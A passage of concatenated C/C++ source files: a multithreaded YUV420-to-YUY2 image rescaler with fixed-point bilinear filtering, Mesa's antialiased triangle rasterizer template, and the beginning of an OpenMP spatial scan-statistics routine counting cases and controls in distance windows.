uint8_t g_a = (rgb_a >> 8) & 0xff;
uint8_t b_a = (rgb_a >> 16) & 0xff;
uint32_t rgb_b = rgba32[rgb_access + 1];
uint8_t r_b = rgb_b & 0xff;
uint8_t g_b = (rgb_b >> 8) & 0xff;
uint8_t b_b = (rgb_b >> 16) & 0xff;
uint32_t yuyv;
yuyv = (RGB2Y(r_a, g_a, b_a) & 0xff);
yuyv |= (RGB2U(r_a, g_a, b_a) & 0xff) << 8;
yuyv |= (RGB2Y(r_b, g_b, b_b) & 0xff) << 16;
yuyv |= (RGB2V(r_a, g_a, b_a) & 0xff) << 24;
int yuy2_access = yuyv_line + (x >> 1);
yuy2_32[yuy2_access] = yuyv;
}
}
ARIBEIRO_INLINE
static int filter_int_lerp(int a, int b, int lrp) {
int one_minus_lrp = FILTER_MASK - lrp;
int result = (a * one_minus_lrp + b * lrp) >> FILTER_PRECISION_BITS;
return result;
}
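// Worked example (values follow from the constants above): with
// FILTER_PRECISION_BITS == 10 the fraction lrp lives in [0, 1023], and
// filter_int_lerp(0, 255, 512) == (0 * 511 + 255 * 512) >> 10 == 127.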
/// D-f(0,1) ---*----- C-f(1,1)
/// | | |
/// | | |
/// . *--------P---------* P = (dx,dy)
/// | | |
/// | | |
/// A-f(0,0) ---*----- B-f(1,0)
ARIBEIRO_INLINE
static int filter_int_blerp(int A, int B, int C, int D,
int dx, int dy) {
int one_minus_dx = FILTER_MASK - dx;
int one_minus_dy = FILTER_MASK - dy;
/*
// x pass
int a_b = (A * one_minus_dx + B * dx) >> FILTER_PRECISION_BITS;
int d_c = (D * one_minus_dx + C * dx) >> FILTER_PRECISION_BITS;
// y pass
return (a_b * one_minus_dy + d_c * dy) >> FILTER_PRECISION_BITS;
*/
int a = one_minus_dx * one_minus_dy * A;
int b = dx * one_minus_dy * B;
int c = dx * dy * C;
int d = one_minus_dx * dy * D;
int result_a = (a + c) >> FILTER_PRECISION_BITS;
int result_b = (b + d) >> FILTER_PRECISION_BITS;
int result = (result_a + result_b) >> FILTER_PRECISION_BITS;
return result;
}
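// Range note (added for clarity): each partial sum above (a + c and b + d)
// is at most 1023 * 1023 * 255 < 2^28, so the fused one-pass form cannot
// overflow a 32-bit int.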
ARIBEIRO_INLINE
static uint8_t filter_pixel(
const uint8_t *yuv420_buffer,
int _420_x,
int _420_y,
int _420_stride,
int _dst_x,
int _dst_y,
int _numerator,
int _denominator_shift
) {
#if FILTER_SELECT == FILTER_NEAREST
int index_420 = (_420_y * _420_stride + _420_x);
uint8_t y = yuv420_buffer[index_420];
#elif FILTER_SELECT == FILTER_LINEAR
// the formula to convert the dst to 420 is:
//
// _420_x = ( _dst_x * _numerator ) >> _denominator_shift;
//
int shift_diff = _denominator_shift - FILTER_PRECISION_BITS;
uint32_t _x_hp = _dst_x * _numerator;
uint32_t _y_hp = _dst_y * _numerator;
if (shift_diff < 0) {
shift_diff = -shift_diff;
_x_hp = _x_hp << shift_diff;
_y_hp = _y_hp << shift_diff;
}
else {
_x_hp = _x_hp >> shift_diff;
_y_hp = _y_hp >> shift_diff;
}
// do x_lerp
uint32_t _x_hp_fraction = _x_hp & FILTER_MASK;
uint32_t _y_hp_fraction = _y_hp & FILTER_MASK;
//int _x_hp_access = (_x_hp >> FILTER_PRECISION_BITS) + center_yuv_420_x;
int _x_min, _x_max;
int _y_min, _y_max;
if (_x_hp_fraction > FILTER_HALF) {
// | * f | -> lrp = f-*
//use the next
_x_min = _420_x;
_x_max = _420_x + 1;
_x_hp_fraction -= FILTER_HALF;
}
else {
// | f * | -> lrp = f+*
//use the previous
_x_min = _420_x - 1;
_x_max = _420_x;
_x_hp_fraction += FILTER_HALF;
}
if (_y_hp_fraction > FILTER_HALF) {
// | * f | -> lrp = f-*
//use the next
_y_min = _420_y;
_y_max = _420_y + 1;
_y_hp_fraction -= FILTER_HALF;
}
else {
// | f * | -> lrp = f+*
//use the previous
_y_min = _420_y - 1;
_y_max = _420_y;
_y_hp_fraction += FILTER_HALF;
}
// test X
/*
int index_x_420_a = (_420_y * _420_stride + _x_min);
int index_x_420_b = (_420_y * _420_stride + _x_max);
int8_t y = filter_int_lerp(yuv420_buffer[index_x_420_a], yuv420_buffer[index_x_420_b], _x_hp_fraction);
// */
// test y
/*
int index_y_420_a = (_y_min * _420_stride + _420_x);
int index_y_420_b = (_y_max * _420_stride + _420_x);
int8_t y = filter_int_lerp(yuv420_buffer[index_y_420_a], yuv420_buffer[index_y_420_b], _y_hp_fraction);
// */
// blerp
/// D-f(0,1) ---*----- C-f(1,1)
/// | | |
/// | | |
/// . *--------P---------* P = (dx,dy)
/// | | |
/// | | |
/// A-f(0,0) ---*----- B-f(1,0)
int index_a = (_x_min + _y_min * _420_stride);// (0,0)
int index_b = (_x_max + _y_min * _420_stride);// (1,0)
int index_c = (_x_max + _y_max * _420_stride);// (1,1)
int index_d = (_x_min + _y_max * _420_stride);// (0,1)
uint8_t y = filter_int_blerp(
yuv420_buffer[index_a], yuv420_buffer[index_b], yuv420_buffer[index_c], yuv420_buffer[index_d],
_x_hp_fraction, _y_hp_fraction);
// */
#endif
return y;
}
// find denominator power 2 shift
ARIBEIRO_INLINE
static void computeNumeratorDenominatorShift(int in_num, int in_deno, int *out_num, int *out_shift) {
// find full_deno power 2 shift
int deno_shift = 0;
int new_deno_shift_aux = 1 << deno_shift;
while (new_deno_shift_aux < in_deno) {
new_deno_shift_aux <<= 1;
deno_shift++;
}
*out_shift = deno_shift;
//recompute the _numerator and full_deno
*out_num = (in_num * new_deno_shift_aux) / in_deno;
}
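// Worked example (added for clarity): in_num = 3, in_deno = 5 rounds the
// denominator up to 8 (shift = 3) and rescales the numerator to
// (3 * 8) / 5 = 4, so x * 3 / 5 is approximated by (x * 4) >> 3.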
struct CopyRescaleMultithread_Job {
int block;
int blockStart;
int blockEnd;
int yuy_w;
int yuy_stride;
int half_num;
int half_deno_shift;
int half_center_yuv_420_x;
int half_center_yuv_420_y;
int yuv420_w;
int yuv420_h;
int full_num;
int full_deno_shift;
int center_yuv_420_x;
int center_yuv_420_y;
const uint8_t *yuv420;
uint8_t *yuy2;
int yuv_420_stride_y;
int yuv_420_stride_uv;
int src_v_start_index;
int src_u_start_index;
};
class CopyRescaleMultithread{
std::vector< PlatformThread * > threads;
int jobDivider;
int threadCount;
PlatformSemaphore semaphore;
ObjectQueue<CopyRescaleMultithread_Job> queue;
void threadRun() {
while (!PlatformThread::isCurrentThreadInterrupted()){
CopyRescaleMultithread_Job job = queue.dequeue();
if (queue.isSignaled())
break;
for (int _y = job.blockStart; _y < job.blockEnd; _y++) {
for (int _x = 0; _x < job.yuy_w; _x++) {
int index_y = (_y * job.yuy_stride + _x) << 1;
int index_u_or_v = index_y + 1;
int _x_dst_pos = _x;
int _y_dst_pos = _y;
int half_420_x = ((_x_dst_pos * job.half_num) >> job.half_deno_shift) + job.half_center_yuv_420_x;
int half_420_y = ((_y_dst_pos * job.half_num) >> job.half_deno_shift) + job.half_center_yuv_420_y;
if (half_420_x >= 2 && half_420_x < ((job.yuv420_w >> 1) - 2) &&
half_420_y >= 0 && half_420_y < (job.yuv420_h >> 1)) {
int _420_x = ((_x_dst_pos * job.full_num) >> job.full_deno_shift) + job.center_yuv_420_x;
int _420_y = ((_y_dst_pos * job.full_num) >> job.full_deno_shift) + job.center_yuv_420_y;
job.yuy2[index_y] = filter_pixel(
job.yuv420,
_420_x, _420_y,
job.yuv_420_stride_y,
_x_dst_pos, _y_dst_pos,
job.full_num, job.full_deno_shift
);
int uv_start_index;
if (_x % 2 != 0) {
// process (UV) data
// the V value is related to the previous X position of the destination buffer
_x_dst_pos -= 1; // sample 'v' at the previous destination pixel's position
half_420_x = ((_x_dst_pos * job.half_num) >> job.half_deno_shift) + job.half_center_yuv_420_x;
uv_start_index = job.src_v_start_index;
}
else
uv_start_index = job.src_u_start_index;
job.yuy2[index_u_or_v] = filter_pixel(
&job.yuv420[uv_start_index],
half_420_x, half_420_y,
job.yuv_420_stride_uv,
_x_dst_pos, _y_dst_pos,
job.half_num, job.half_deno_shift
);
}
else {
//black
job.yuy2[index_y] = 16;
job.yuy2[index_u_or_v] = 128;
}
}
}
semaphore.release();
}
}
public:
void yuv420_to_yuy2_copy_rescale(const uint8_t *yuv420, int yuv420_w, int yuv420_h, uint8_t *yuy2, int yuy_w, int yuy_h) {
int center_yuy_x = yuy_w / 2;
int center_yuy_y = yuy_h / 2;
float aspect_yuv = (float)yuv420_w / (float)yuv420_h;
float aspect_yuy = (float)yuy_w / (float)yuy_h;
bool fit_width = (aspect_yuv <= aspect_yuy);
int full_num = 1;
int full_deno_shift = 0;
int half_num = 1;
int half_deno_shift = 0;
int px_to_remove = 8;
if (!fit_width) {
//fit width
computeNumeratorDenominatorShift(yuv420_w - px_to_remove, yuy_w, &full_num, &full_deno_shift);
computeNumeratorDenominatorShift((yuv420_w - px_to_remove) >> 1, yuy_w, &half_num, &half_deno_shift);
}
else {
//fit height
computeNumeratorDenominatorShift(yuv420_h - px_to_remove, yuy_h, &full_num, &full_deno_shift);
computeNumeratorDenominatorShift((yuv420_h - px_to_remove) >> 1, yuy_h, &half_num, &half_deno_shift);
}
px_to_remove = 0;
int center_yuv_420_x = ((yuv420_w - px_to_remove) >> 1) - ((center_yuy_x *full_num) >> full_deno_shift) - 2;
int center_yuv_420_y = ((yuv420_h - px_to_remove) >> 1) - ((center_yuy_y *full_num) >> full_deno_shift) - 2;
int half_center_yuv_420_x = ((yuv420_w - px_to_remove) >> 2) - ((center_yuy_x *half_num) >> half_deno_shift) - 1;
int half_center_yuv_420_y = ((yuv420_h - px_to_remove) >> 2) - ((center_yuy_y *half_num) >> half_deno_shift) - 1;
int yuv_420_stride_y = yuv420_w;
int yuv_420_stride_uv = yuv420_w >> 1;
int yuv_420_y_total_size = yuv_420_stride_y * yuv420_h;
int yuv_420_uv_total_size = yuv_420_stride_uv * (yuv420_h >> 1);
int src_u_start_index = yuv_420_y_total_size;
int src_v_start_index = src_u_start_index + yuv_420_uv_total_size;
int yuy_stride = yuy_w;
//int h_per_block = yuy_h / jobDivider + (((yuy_h % jobDivider) > 0) ? 1 : 0);
int division = jobDivider;
int h_per_block = yuy_h / jobDivider;// +(((height % jobDivider) > 0) ? 1 : 0);
if (yuy_h % jobDivider) {
//either use division + 1 blocks or use h_per_block + 1 rows per block
int div_plus_1_total = (division + 1) * h_per_block;
int h_per_block_plus_1_total = division * (h_per_block + 1);
if (div_plus_1_total < h_per_block_plus_1_total)
division++;
else
h_per_block++;
}
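// Worked example (added for clarity): yuy_h = 1081 with jobDivider = 8 gives
// h_per_block = 135 plus a remainder; since 9 * 135 = 1215 is not less than
// 8 * 136 = 1088, h_per_block grows to 136, and the final block is clamped
// to yuy_h when enqueued below.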
CopyRescaleMultithread_Job job;
job.yuy_w = yuy_w;
job.yuy_stride = yuy_stride;
job.half_num = half_num;
job.half_deno_shift = half_deno_shift;
job.half_center_yuv_420_x = half_center_yuv_420_x;
job.half_center_yuv_420_y = half_center_yuv_420_y;
job.yuv420_w = yuv420_w;
job.yuv420_h = yuv420_h;
job.full_num = full_num;
job.full_deno_shift = full_deno_shift;
job.center_yuv_420_x = center_yuv_420_x;
job.center_yuv_420_y = center_yuv_420_y;
job.yuv420 = yuv420;
job.yuy2 = yuy2;
job.yuv_420_stride_y = yuv_420_stride_y;
job.yuv_420_stride_uv = yuv_420_stride_uv;
job.src_v_start_index = src_v_start_index;
job.src_u_start_index = src_u_start_index;
for (int block = 0; block < division; block++) {
job.block = block;
job.blockStart = block * h_per_block;
job.blockEnd = (block + 1) * h_per_block;
if (yuy_h < job.blockEnd)
job.blockEnd = yuy_h;
queue.enqueue(job);
}
for (int block = 0; block < division; block++)
semaphore.blockingAcquire();
}
CopyRescaleMultithread(int threadCount, int jobDivider):semaphore(0){
this->jobDivider = jobDivider;
this->threadCount = threadCount;
for(int i=0;i<threadCount;i++){
threads.push_back(new PlatformThread(this, &CopyRescaleMultithread::threadRun));
}
for (int i = 0; i < threads.size(); i++)
threads[i]->start();
}
void finalizeThreads() {
printf("[CopyRescaleMultithread] finalize threads start\n");
for (int i = 0; i < threads.size(); i++)
threads[i]->interrupt();
for (int i = 0; i < threads.size(); i++)
threads[i]->wait();
printf("[CopyRescaleMultithread] finalize threads done\n");
}
virtual ~CopyRescaleMultithread() {
for(int i=0;i<threads.size();i++)
threads[i]->interrupt();
for(int i=0;i<threads.size();i++)
threads[i]->wait();
for(int i=0;i<threads.size();i++)
delete threads[i];
threads.clear();
threadCount = 0;
}
};
#endif |
s_aatritemp.h | /*
* Mesa 3-D graphics library
* Version: 7.0.3
*
* Copyright (C) 1999-2007 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* Antialiased Triangle Rasterizer Template
*
* This file is #include'd to generate custom AA triangle rasterizers.
* NOTE: this code hasn't been optimized yet. That'll come after it
* works correctly.
*
 * The following macros may be defined to indicate what auxiliary information
 * must be computed across the triangle:
* DO_Z - if defined, compute Z values
* DO_ATTRIBS - if defined, compute texcoords, varying, etc.
*/
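/*
 * Usage sketch (illustrative; roughly how Mesa's s_aatriangle.c
 * instantiates this template). The body below is a bare compound statement,
 * so the file is #include'd inside a function definition:
 *
 * #define DO_Z
 * static void aa_z_triangle(struct gl_context *ctx, const SWvertex *v0,
 *                           const SWvertex *v1, const SWvertex *v2)
 * {
 * #include "s_aatritemp.h"
 * }
 */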
/*void triangle( struct gl_context *ctx, GLuint v0, GLuint v1, GLuint v2, GLuint pv )*/
{
const SWcontext *swrast = SWRAST_CONTEXT(ctx);
const GLfloat *p0 = v0->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *p1 = v1->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *p2 = v2->attrib[FRAG_ATTRIB_WPOS];
const SWvertex *vMin, *vMid, *vMax;
GLint iyMin, iyMax;
GLfloat yMin, yMax;
GLboolean ltor;
GLfloat majDx, majDy; /* major (i.e. long) edge dx and dy */
SWspan span;
#ifdef DO_Z
GLfloat zPlane[4];
#endif
GLfloat rPlane[4], gPlane[4], bPlane[4], aPlane[4];
#if defined(DO_ATTRIBS)
GLfloat attrPlane[FRAG_ATTRIB_MAX][4][4];
GLfloat wPlane[4]; /* win[3] */
#endif
GLfloat bf = SWRAST_CONTEXT(ctx)->_BackfaceCullSign;
(void) swrast;
INIT_SPAN(span, GL_POLYGON);
span.arrayMask = SPAN_COVERAGE;
/* determine bottom to top order of vertices */
{
GLfloat y0 = v0->attrib[FRAG_ATTRIB_WPOS][1];
GLfloat y1 = v1->attrib[FRAG_ATTRIB_WPOS][1];
GLfloat y2 = v2->attrib[FRAG_ATTRIB_WPOS][1];
if (y0 <= y1) {
if (y1 <= y2) {
vMin = v0; vMid = v1; vMax = v2; /* y0<=y1<=y2 */
}
else if (y2 <= y0) {
vMin = v2; vMid = v0; vMax = v1; /* y2<=y0<=y1 */
}
else {
vMin = v0; vMid = v2; vMax = v1; bf = -bf; /* y0<=y2<=y1 */
}
}
else {
if (y0 <= y2) {
vMin = v1; vMid = v0; vMax = v2; bf = -bf; /* y1<=y0<=y2 */
}
else if (y2 <= y1) {
vMin = v2; vMid = v1; vMax = v0; bf = -bf; /* y2<=y1<=y0 */
}
else {
vMin = v1; vMid = v2; vMax = v0; /* y1<=y2<=y0 */
}
}
}
majDx = vMax->attrib[FRAG_ATTRIB_WPOS][0] - vMin->attrib[FRAG_ATTRIB_WPOS][0];
majDy = vMax->attrib[FRAG_ATTRIB_WPOS][1] - vMin->attrib[FRAG_ATTRIB_WPOS][1];
/* front/back-face determination and culling */
{
const GLfloat botDx = vMid->attrib[FRAG_ATTRIB_WPOS][0] - vMin->attrib[FRAG_ATTRIB_WPOS][0];
const GLfloat botDy = vMid->attrib[FRAG_ATTRIB_WPOS][1] - vMin->attrib[FRAG_ATTRIB_WPOS][1];
const GLfloat area = majDx * botDy - botDx * majDy;
/* Do backface culling */
if (area * bf < 0 || area == 0 || IS_INF_OR_NAN(area))
return;
ltor = (GLboolean) (area < 0.0F);
span.facing = area * swrast->_BackfaceSign > 0.0F;
}
/* Plane equation setup:
* We evaluate plane equations at window (x,y) coordinates in order
* to compute color, Z, fog, texcoords, etc. This isn't terribly
* efficient but it's easy and reliable.
*/
#ifdef DO_Z
compute_plane(p0, p1, p2, p0[2], p1[2], p2[2], zPlane);
span.arrayMask |= SPAN_Z;
#endif
if (ctx->Light.ShadeModel == GL_SMOOTH) {
compute_plane(p0, p1, p2, v0->color[RCOMP], v1->color[RCOMP], v2->color[RCOMP], rPlane);
compute_plane(p0, p1, p2, v0->color[GCOMP], v1->color[GCOMP], v2->color[GCOMP], gPlane);
compute_plane(p0, p1, p2, v0->color[BCOMP], v1->color[BCOMP], v2->color[BCOMP], bPlane);
compute_plane(p0, p1, p2, v0->color[ACOMP], v1->color[ACOMP], v2->color[ACOMP], aPlane);
}
else {
constant_plane(v2->color[RCOMP], rPlane);
constant_plane(v2->color[GCOMP], gPlane);
constant_plane(v2->color[BCOMP], bPlane);
constant_plane(v2->color[ACOMP], aPlane);
}
span.arrayMask |= SPAN_RGBA;
#if defined(DO_ATTRIBS)
{
const GLfloat invW0 = v0->attrib[FRAG_ATTRIB_WPOS][3];
const GLfloat invW1 = v1->attrib[FRAG_ATTRIB_WPOS][3];
const GLfloat invW2 = v2->attrib[FRAG_ATTRIB_WPOS][3];
compute_plane(p0, p1, p2, invW0, invW1, invW2, wPlane);
span.attrStepX[FRAG_ATTRIB_WPOS][3] = plane_dx(wPlane);
span.attrStepY[FRAG_ATTRIB_WPOS][3] = plane_dy(wPlane);
ATTRIB_LOOP_BEGIN
GLuint c;
if (swrast->_InterpMode[attr] == GL_FLAT) {
for (c = 0; c < 4; c++) {
constant_plane(v2->attrib[attr][c] * invW2, attrPlane[attr][c]);
}
}
else {
for (c = 0; c < 4; c++) {
const GLfloat a0 = v0->attrib[attr][c] * invW0;
const GLfloat a1 = v1->attrib[attr][c] * invW1;
const GLfloat a2 = v2->attrib[attr][c] * invW2;
compute_plane(p0, p1, p2, a0, a1, a2, attrPlane[attr][c]);
}
}
for (c = 0; c < 4; c++) {
span.attrStepX[attr][c] = plane_dx(attrPlane[attr][c]);
span.attrStepY[attr][c] = plane_dy(attrPlane[attr][c]);
}
ATTRIB_LOOP_END
}
#endif
/* Begin bottom-to-top scan over the triangle.
* The long edge will either be on the left or right side of the
* triangle. We always scan from the long edge toward the shorter
* edges, stopping when we find that coverage = 0. If the long edge
* is on the left we scan left-to-right. Else, we scan right-to-left.
*/
yMin = vMin->attrib[FRAG_ATTRIB_WPOS][1];
yMax = vMax->attrib[FRAG_ATTRIB_WPOS][1];
iyMin = (GLint) yMin;
iyMax = (GLint) yMax + 1;
if (ltor) {
/* scan left to right */
const GLfloat *pMin = vMin->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *pMid = vMid->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *pMax = vMax->attrib[FRAG_ATTRIB_WPOS];
const GLfloat dxdy = majDx / majDy;
const GLfloat xAdj = dxdy < 0.0F ? -dxdy : 0.0F;
GLint iy;
#ifdef _OPENMP
#pragma omp parallel for schedule(dynamic) private(iy) firstprivate(span)
#endif
for (iy = iyMin; iy < iyMax; iy++) {
GLfloat x = pMin[0] - (yMin - iy) * dxdy;
GLint ix, startX = (GLint) (x - xAdj);
GLuint count;
GLfloat coverage = 0.0F;
#ifdef _OPENMP
/* each thread needs to use a different (global) SpanArrays variable */
span.array = SWRAST_CONTEXT(ctx)->SpanArrays + omp_get_thread_num();
#endif
/* skip over fragments with zero coverage */
while (startX < SWRAST_MAX_WIDTH) {
coverage = compute_coveragef(pMin, pMid, pMax, startX, iy);
if (coverage > 0.0F)
break;
startX++;
}
/* enter interior of triangle */
ix = startX;
#if defined(DO_ATTRIBS)
/* compute attributes at left-most fragment */
span.attrStart[FRAG_ATTRIB_WPOS][3] = solve_plane(ix + 0.5F, iy + 0.5F, wPlane);
ATTRIB_LOOP_BEGIN
GLuint c;
for (c = 0; c < 4; c++) {
span.attrStart[attr][c] = solve_plane(ix + 0.5F, iy + 0.5F, attrPlane[attr][c]);
}
ATTRIB_LOOP_END
#endif
count = 0;
while (coverage > 0.0F) {
/* (cx,cy) = center of fragment */
const GLfloat cx = ix + 0.5F, cy = iy + 0.5F;
SWspanarrays *array = span.array;
array->coverage[count] = coverage;
#ifdef DO_Z
array->z[count] = (GLuint) solve_plane(cx, cy, zPlane);
#endif
array->rgba[count][RCOMP] = solve_plane_chan(cx, cy, rPlane);
array->rgba[count][GCOMP] = solve_plane_chan(cx, cy, gPlane);
array->rgba[count][BCOMP] = solve_plane_chan(cx, cy, bPlane);
array->rgba[count][ACOMP] = solve_plane_chan(cx, cy, aPlane);
ix++;
count++;
coverage = compute_coveragef(pMin, pMid, pMax, ix, iy);
}
if (ix > startX) {
span.x = startX;
span.y = iy;
span.end = (GLuint) ix - (GLuint) startX;
_swrast_write_rgba_span(ctx, &span);
}
}
}
else {
/* scan right to left */
const GLfloat *pMin = vMin->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *pMid = vMid->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *pMax = vMax->attrib[FRAG_ATTRIB_WPOS];
const GLfloat dxdy = majDx / majDy;
const GLfloat xAdj = dxdy > 0 ? dxdy : 0.0F;
GLint iy;
#ifdef _OPENMP
#pragma omp parallel for schedule(dynamic) private(iy) firstprivate(span)
#endif
for (iy = iyMin; iy < iyMax; iy++) {
GLfloat x = pMin[0] - (yMin - iy) * dxdy;
GLint ix, left, startX = (GLint) (x + xAdj);
GLuint count, n;
GLfloat coverage = 0.0F;
#ifdef _OPENMP
/* each thread needs to use a different (global) SpanArrays variable */
span.array = SWRAST_CONTEXT(ctx)->SpanArrays + omp_get_thread_num();
#endif
/* make sure we're not past the window edge */
if (startX >= ctx->DrawBuffer->_Xmax) {
startX = ctx->DrawBuffer->_Xmax - 1;
}
/* skip fragments with zero coverage */
while (startX > 0) {
coverage = compute_coveragef(pMin, pMax, pMid, startX, iy);
if (coverage > 0.0F)
break;
startX--;
}
/* enter interior of triangle */
ix = startX;
count = 0;
while (coverage > 0.0F) {
/* (cx,cy) = center of fragment */
const GLfloat cx = ix + 0.5F, cy = iy + 0.5F;
SWspanarrays *array = span.array;
ASSERT(ix >= 0);
array->coverage[ix] = coverage;
#ifdef DO_Z
array->z[ix] = (GLuint) solve_plane(cx, cy, zPlane);
#endif
array->rgba[ix][RCOMP] = solve_plane_chan(cx, cy, rPlane);
array->rgba[ix][GCOMP] = solve_plane_chan(cx, cy, gPlane);
array->rgba[ix][BCOMP] = solve_plane_chan(cx, cy, bPlane);
array->rgba[ix][ACOMP] = solve_plane_chan(cx, cy, aPlane);
ix--;
count++;
coverage = compute_coveragef(pMin, pMax, pMid, ix, iy);
}
#if defined(DO_ATTRIBS)
/* compute attributes at left-most fragment */
span.attrStart[FRAG_ATTRIB_WPOS][3] = solve_plane(ix + 1.5F, iy + 0.5F, wPlane);
ATTRIB_LOOP_BEGIN
GLuint c;
for (c = 0; c < 4; c++) {
span.attrStart[attr][c] = solve_plane(ix + 1.5F, iy + 0.5F, attrPlane[attr][c]);
}
ATTRIB_LOOP_END
#endif
if (startX > ix) {
n = (GLuint) startX - (GLuint) ix;
left = ix + 1;
/* shift all values to the left */
/* XXX this is temporary */
{
SWspanarrays *array = span.array;
GLint j;
for (j = 0; j < (GLint) n; j++) {
array->coverage[j] = array->coverage[j + left];
COPY_CHAN4(array->rgba[j], array->rgba[j + left]);
#ifdef DO_Z
array->z[j] = array->z[j + left];
#endif
}
}
span.x = left;
span.y = iy;
span.end = n;
_swrast_write_rgba_span(ctx, &span);
}
}
}
}
#undef DO_Z
#undef DO_ATTRIBS
#undef DO_OCCLUSION_TEST
|
scan.c | /**
* scan.c
* Authors: Yizhao Gao <yizhaotsccsj@gmail.com>
 * Date: 08/03/2017
*/
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <omp.h>
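// NOTE (added for clarity): despite the .c extension this file relies on
// C++ features (function overloading and bool), so it is presumably built
// with a C++ compiler.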
void getCCCount4DSph(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, int * casInW, int * conInW, int elimIntersectOD) {
double distance;
int minWindow;
for(int i = 0; i < locCount * wCount; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
#pragma omp parallel for private(distance, minWindow)
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < locCount; j++) {
distance = sqrt((x1[i] - x1[j]) * (x1[i] - x1[j]) + (y1[i] - y1[j]) * (y1[i] - y1[j]) + (x2[i] - x2[j]) * (x2[i] - x2[j]) + (y2[i] - y2[j]) * (y2[i] - y2[j]));
minWindow = (int)(ceil(distance / wSize));
if(minWindow > 0)
minWindow --;
for(int k = minWindow; k < wCount; k++) {
casInW[i * wCount + k] += nCass[j];
conInW[i * wCount + k] += nCons[j];
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((x1[i] - x2[i]) * (x1[i] - x2[i]) + (y1[i] - y2[i]) * (y1[i] - y2[i])) / 2;
int maxWindow = ODDistance / wSize;
for(int k = maxWindow; k < wCount; k++) {
casInW[i * wCount + k] = -1;
}
}
}
return;
}
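/*
 * Window-index note (added for clarity): window k of a center covers radius
 * (k + 1) * wSize, so a point at distance d first contributes at window
 * k = ceil(d / wSize) - 1; the conditional decrement of minWindow above
 * implements exactly that, with the k = 0 window still reached when d = 0.
 */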
void getCCCount4DSph(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, double xMin, double yMin, double cellSize, int nCol, int nRow, int * casInW, int * conInW, int elimIntersectOD) {
double distance;
int minWindow;
int totalWindows = nCol * nCol * nRow * nRow * wCount;
for(int i = 0; i < totalWindows; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
int totalCenters = nRow * nRow * nCol * nCol;
#pragma omp parallel for private(distance, minWindow)
for(int i = 0; i < totalCenters; i++) {
int temp;
int cX2 = i % nCol;
temp = i / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double centerX1 = xMin + cellSize * cX1;
double centerY1 = yMin + cellSize * cY1;
double centerX2 = xMin + cellSize * cX2;
double centerY2 = yMin + cellSize * cY2;
for(int j = 0; j < locCount; j++) {
distance = sqrt((centerX1 - x1[j]) * (centerX1 - x1[j]) + (centerY1 - y1[j]) * (centerY1 - y1[j]) + (centerX2 - x2[j]) * (centerX2 - x2[j]) + (centerY2 - y2[j]) * (centerY2 - y2[j]));
minWindow = (int)(ceil(distance / wSize));
if(minWindow > 0)
minWindow --;
for(int k = minWindow; k < wCount; k++) {
casInW[i * wCount + k] += nCass[j];
conInW[i * wCount + k] += nCons[j];
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((centerX1 - centerX2) * (centerX1 - centerX2) + (centerY1 - centerY2) * (centerY1 - centerY2)) / 2;
int maxWindow = ODDistance / wSize;
for(int k = maxWindow; k < wCount; k++) {
casInW[i * wCount + k] = -1;
}
}
}
}
void getCCCount2DSame(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, int * casInW, int * conInW, int elimIntersectOD) {
double distanceO, distanceD;
int minWindow;
for(int i = 0; i < locCount * wCount; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
#pragma omp parallel for private(distanceO, distanceD, minWindow)
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < locCount; j++) {
distanceO = sqrt((x1[i] - x1[j]) * (x1[i] - x1[j]) + (y1[i] - y1[j]) * (y1[i] - y1[j]));
distanceD = sqrt((x2[i] - x2[j]) * (x2[i] - x2[j]) + (y2[i] - y2[j]) * (y2[i] - y2[j]));
if(distanceO > distanceD) {
minWindow = (int)(ceil(distanceO / wSize));
}
else {
minWindow = (int)(ceil(distanceD / wSize));
}
if(minWindow > 0)
minWindow --;
for(int k = minWindow; k < wCount; k++) {
casInW[i * wCount + k] += nCass[j];
conInW[i * wCount + k] += nCons[j];
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((x1[i] - x2[i]) * (x1[i] - x2[i]) + (y1[i] - y2[i]) * (y1[i] - y2[i])) / 2;
int maxWindow = ODDistance / wSize;
for(int k = maxWindow; k < wCount; k++) {
casInW[i * wCount + k] = -1;
}
}
}
return;
}
void getCCCount2DSame(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, double xMin, double yMin, double cellSize, int nCol, int nRow, int * casInW, int * conInW, int elimIntersectOD) {
double distanceO, distanceD;
int minWindow;
int totalWindows = nCol * nCol * nRow * nRow * wCount;
for(int i = 0; i < totalWindows; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
